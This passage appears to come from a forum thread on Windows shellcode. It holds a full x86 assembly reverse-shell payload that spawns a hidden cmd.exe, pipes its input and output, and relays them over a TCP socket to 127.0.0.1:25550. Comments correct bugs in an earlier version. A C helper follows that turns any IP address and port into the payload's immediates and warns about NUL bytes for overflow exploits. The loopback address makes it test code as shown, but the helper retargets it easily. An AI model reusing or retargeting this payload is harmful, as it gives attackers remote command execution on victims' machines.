    pop edi                     ; edi = address of 'res'; data is reached as [edi-res+label]

startup:                        ; WSAStartup(0x101, &wsadata)
    OffSide [edi-res+lib],[edi-res+wsa]
    sub esp, WSADATA_size
    and esp, 0x0FFFFFFFC
    mov esi,esp
    push esi
    push dword 0x101
    mov ebx,ecx
    call ebx

sock:                           ; socket(AF_INET, SOCK_STREAM, 0)
    OffSide [edi-res+lib],[edi-res+wss]
    xor eax,eax
    push eax
    inc eax
    push eax
    inc eax
    push eax
    mov ebx,ecx
    call ebx
    cmp eax,-1                  ; INVALID_SOCKET (the original's "cmp eax,1 / jb" never caught it)
    jz exit
    mov esi,eax                 ; esi = socket

createpipe1:                    ; CreatePipe(&srd, &srw, &sa, 0): cmd.exe's stdout/stderr
    OffSide [edi-res+ker],[edi-res+crp]
    sub esp, SECURITY_ATTRIBUTES_size
    and esp, 0x0FFFFFFFC
    mov dword [esp],12          ; sa.nLength
    mov dword [esp+4],0         ; sa.lpSecurityDescriptor
    mov dword [esp+8],1         ; sa.bInheritHandle = TRUE
    mov edx,esp
    push dword 0
    push edx
    lea eax,[edi-res+srw]
    push eax
    lea eax,[edi-res+srd]
    push eax
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz exit

createpipe2:                    ; CreatePipe(&rrd, &rrw, &sa, 0): cmd.exe's stdin
    OffSide [edi-res+ker],[edi-res+crp]
    sub esp, SECURITY_ATTRIBUTES_size
    and esp, 0x0FFFFFFFC
    mov dword [esp],12
    mov dword [esp+4],0
    mov dword [esp+8],1
    mov edx,esp
    push dword 0
    push edx
    lea eax,[edi-res+rrw]
    push eax
    lea eax,[edi-res+rrd]
    push eax
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz exit

getinfo:                        ; GetStartupInfoA(&si)
    OffSide [edi-res+ker],[edi-res+get]
    sub esp, STARTUPINFO_size   ; reserve si on the stack (the original derived it from edx, below esp,
    and esp, 0x0FFFFFFFC        ; where the pushes that follow could overwrite it)
    mov edx,esp
    push edx
    mov ebx,ecx
    call ebx

createpro:                      ; CreateProcessA(0, "cmd.exe", &sa, &sa, TRUE, NORMAL_PRIORITY_CLASS, 0, 0, &si, &pi)
    OffSide [edi-res+ker],[edi-res+cre]
    mov edx,esp                 ; si is still at the top of the stack (edx is not preserved across the calls in OffSide)
    mov dword [edx],68          ; si.cb
    mov eax,[edi-res+srw]
    mov [edx+64],eax            ; si.hStdError
    mov [edx+60],eax            ; si.hStdOutput
    mov eax,[edi-res+rrd]
    mov dword [edx+56],eax      ; si.hStdInput
    mov dword [edx+44],0x101    ; si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
    mov word [edx+48],0         ; si.wShowWindow = SW_HIDE
    sub esp,PROCESS_INFORMATION_size
    and esp, 0x0FFFFFFFC
    mov ebx,esp                 ; ebx = &pi
    sub esp, SECURITY_ATTRIBUTES_size
    and esp, 0x0FFFFFFFC
    mov dword [esp],12
    mov dword [esp+4],0
    mov dword [esp+8],1
    mov eax,esp                 ; eax = &sa
    push ebx
    push edx
    push dword 0
    push dword 0
    push dword 0x20
    push dword 1
    push dword eax
    push dword eax
    lea eax,[edi-res+cmd]
    push eax
    push dword 0
    mov ebx,ecx
    call ebx
    ;cmp eax,0
    ;jz exit

CloseHandle1:                   ; CloseHandle(srw): the child has its own copies
    OffSide [edi-res+ker],[edi-res+clh]
    push dword [edi-res+srw]
    mov ebx,ecx
    call ebx
closehandle2:                   ; CloseHandle(rrd)
    OffSide [edi-res+ker],[edi-res+clh]
    push dword [edi-res+rrd]
    mov ebx,ecx
    call ebx

Alloc:                          ; GlobalAlloc(GMEM_ZEROINIT, 99999): the I/O buffer
    OffSide [edi-res+ker],[edi-res+all]
    push dword 99999
    push dword 0x40
    mov ebx,ecx
    call ebx
    mov [edi-res+byt],eax

conn:                           ; connect(s, &{AF_INET, htons(25550), 127.0.0.1}, 16)
    OffSide [edi-res+lib],[edi-res+con]
    sub esp, sockaddr_size
    and esp, 0x0FFFFFFFC
    mov word [esp],2            ; sin_family = AF_INET
    mov word [esp+2],0xCE63     ; sin_port: bytes 63 CE = 25550 in network order (the original wrote a dword here, shifting sin_addr)
    mov dword [esp+4],0x0100007F ; sin_addr: bytes 7F 00 00 01 = 127.0.0.1
    mov edx,esp
    push byte 16
    push edx
    push esi
    mov ebx,ecx
    call ebx
    cmp eax,-1                  ; connect returns 0 on success and SOCKET_ERROR on failure
    jz exit                     ; (the original exited on 0 and overwrote the socket in esi with it)

mandar:                         ; PeekNamedPipe(srd, 0, 1024, &bys, 0, 0): does cmd.exe have output?
    OffSide [edi-res+ker],[edi-res+pip]
    xor eax,eax
    push eax
    push eax
    lea eax,[edi-res+bys]
    push eax
    push dword 1024
    push dword 0
    push dword [edi-res+srd]
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz recibir
    cmp dword [edi-res+bys],0
    jz recibir
    OffSide [edi-res+ker],[edi-res+red]   ; ReadFile(srd, byt, bys, &bys, 0)
    push dword 0
    lea eax,[edi-res+bys]       ; lpNumberOfBytesRead is a pointer (the original pushed the value)
    push eax
    push dword [edi-res+bys]
    push dword [edi-res+byt]
    push dword [edi-res+srd]
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz recibir
    OffSide [edi-res+lib],[edi-res+sen]   ; send(sock, byt, bys, 0)
    push dword 0
    push dword [edi-res+bys]
    push dword [edi-res+byt]
    push esi
    mov ebx,ecx
    call ebx
    cmp eax,-1
    jz recibir
    OffSide [edi-res+ker],[edi-res+sle]   ; Sleep(100)
    push dword 100
    mov ebx,ecx
    call ebx
    jmp mandar

recibir:                        ; recv(sock, byt, 1024, 0)
    OffSide [edi-res+lib],[edi-res+rev]
    push dword 0
    push dword 1024
    push dword [edi-res+byt]
    push esi
    mov ebx,ecx
    call ebx
    cmp eax,-1
    jz exit
    cmp eax,0
    jz exit
    mov [edi-res+bys],eax       ; bytes received, kept in memory (edx would not survive the calls in OffSide)
    OffSide [edi-res+ker],[edi-res+wri]   ; WriteFile(rrw, byt, bys, &bys, 0)
    push dword 0
    lea eax,[edi-res+bys]
    push eax
    push dword [edi-res+bys]
    push dword [edi-res+byt]
    push dword [edi-res+rrw]
    mov ebx,ecx
    call ebx
    cmp eax,0
    jz exit
    OffSide [edi-res+ker],[edi-res+sle]   ; Sleep(100)
    push dword 100
    mov ebx,ecx
    call ebx
    jmp mandar

exit:                           ; closesocket(esi); WSACleanup(); ExitProcess(0)
    OffSide [edi-res+lib],[edi-res+clo]
    push esi
    mov ebx,ecx
    call ebx
    OffSide [edi-res+lib],[edi-res+wsc]
    mov ebx,ecx
    call ebx
    OffSide [edi-res+ker],[edi-res+exi]
    push dword 0
    mov ebx,ecx
    call ebx

datos:
    call start
res dd 0
cmd db "cmd.exe",0              ; the original lacked the terminator, so "cmd.exe" ran into the next string
lib db "WS2_32.DLL",0
ker db "kernel32.dll",0
sle db "Sleep",0
con db "connect",0
wss db "socket",0
clo db "closesocket",0
wsa db "WSAStartup",0
wsc db "WSACleanup",0
exi db "ExitProcess",0
cre db "CreateProcessA",0
crp db "CreatePipe",0
clh db "CloseHandle",0
get db "GetStartupInfoA",0
all db "GlobalAlloc",0
pip db "PeekNamedPipe",0
red db "ReadFile",0
wri db "WriteFile",0
sen db "send",0
rev db "recv",0
srd dd 0
srw dd 0
rrd dd 0
rrw dd 0
bys dd 0
byt dd 0
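The iphex.zip above is a Visual Basic tool and its sources are not on this page; as an added example, not the poster's code, here is the same conversion in C. The sockaddr_in constants in these listings depend on two byte orders at once: sin_port and sin_addr are stored big-endian (network order) in memory, while "push dword" and "mov dword" take a little-endian immediate, which is why 25550 becomes 0xCE630002 when combined with sin_family=2 and 127.0.0.1 becomes 0x0100007F. The code converts in both directions so a reader can check those two constants and produce new ones, and flags constants that contain 0x00 bytes, since those break a string-based overflow. It assumes the usual little-endian x86 target the listings are written for.

```c
/* Added example: dotted-quad / port <-> sockaddr_in immediates for x86 asm.
 * Not the iphex.zip program from the thread; a C reimplementation of the idea. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Dotted quad -> the little-endian dword that, stored in memory, is the
 * network-order sin_addr.  Returns the dword (>= 0) or -1 on malformed input. */
long long ip_to_dword(const char *ip)
{
    unsigned a, b, c, d;
    char tail;
    if (sscanf(ip, "%u.%u.%u.%u%c", &a, &b, &c, &d, &tail) != 4) return -1;  /* 4 fields, nothing after */
    if (a > 255 || b > 255 || c > 255 || d > 255) return -1;
    /* bytes in memory a b c d: as a little-endian dword, d is the high byte */
    return (long long)(a | b << 8 | c << 16 | (uint32_t)d << 24);
}

/* Inverse of ip_to_dword.  Returns a static buffer (fine for a tool, not for threads). */
const char *dword_to_ip(uint32_t v)
{
    static char buf[16];
    snprintf(buf, sizeof buf, "%u.%u.%u.%u", (unsigned)(v & 0xff), (unsigned)((v >> 8) & 0xff),
             (unsigned)((v >> 16) & 0xff), (unsigned)(v >> 24));
    return buf;
}

/* First four bytes of sockaddr_in as one "push dword": sin_family=2 (host
 * order) followed by sin_port in network order.  Bytes: 02 00 hi lo. */
uint32_t family_port_dword(uint16_t port)
{
    return 0x0002u | ((uint32_t)(port >> 8) << 16) | ((uint32_t)(port & 0xff) << 24);
}

/* sin_port alone, for "mov word [esp+2],imm16": the port byte-swapped. */
uint16_t port_word(uint16_t port)
{
    return (uint16_t)((port >> 8) | (port << 8));
}

/* Inverse of family_port_dword; -1 if the family field is not AF_INET. */
int dword_to_port(uint32_t v)
{
    if ((v & 0xffff) != 2) return -1;
    return (int)((((v >> 16) & 0xff) << 8) | (v >> 24));
}

/* 1 if any byte of the immediate is 0x00 (a problem for strcpy-style overflows). */
int has_nul_byte(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xff) == 0) return 1;
    return 0;
}

int main(void)
{
    const char *ip = "127.0.0.1";
    uint16_t port = 25550;
    long long addr = ip_to_dword(ip);
    if (addr < 0) {
        fprintf(stderr, "bad address: %s\n", ip);
        return 1;
    }
    printf("; sockaddr_in for %s:%u\n", dword_to_ip((uint32_t)addr), port);
    printf("push dword 0x%08X            ; sin_addr\n", (unsigned)addr);
    printf("push dword 0x%08X            ; sin_family=2, sin_port=%d\n",
           family_port_dword(port), dword_to_port(family_port_dword(port)));
    printf("mov word [esp+2],0x%04X        ; sin_port alone\n", port_word(port));
    if (has_nul_byte((uint32_t)addr) || has_nul_byte(family_port_dword(port)))
        puts("; note: these immediates contain 0x00 bytes");
    return 0;
}
```

For 127.0.0.1:25550 the tool prints exactly the 0x0100007F and 0xCE630002 used in the listings, and warns that both contain NUL bytes; a loopback address always will, which is one more reason the listings are test code rather than drop-in payloads.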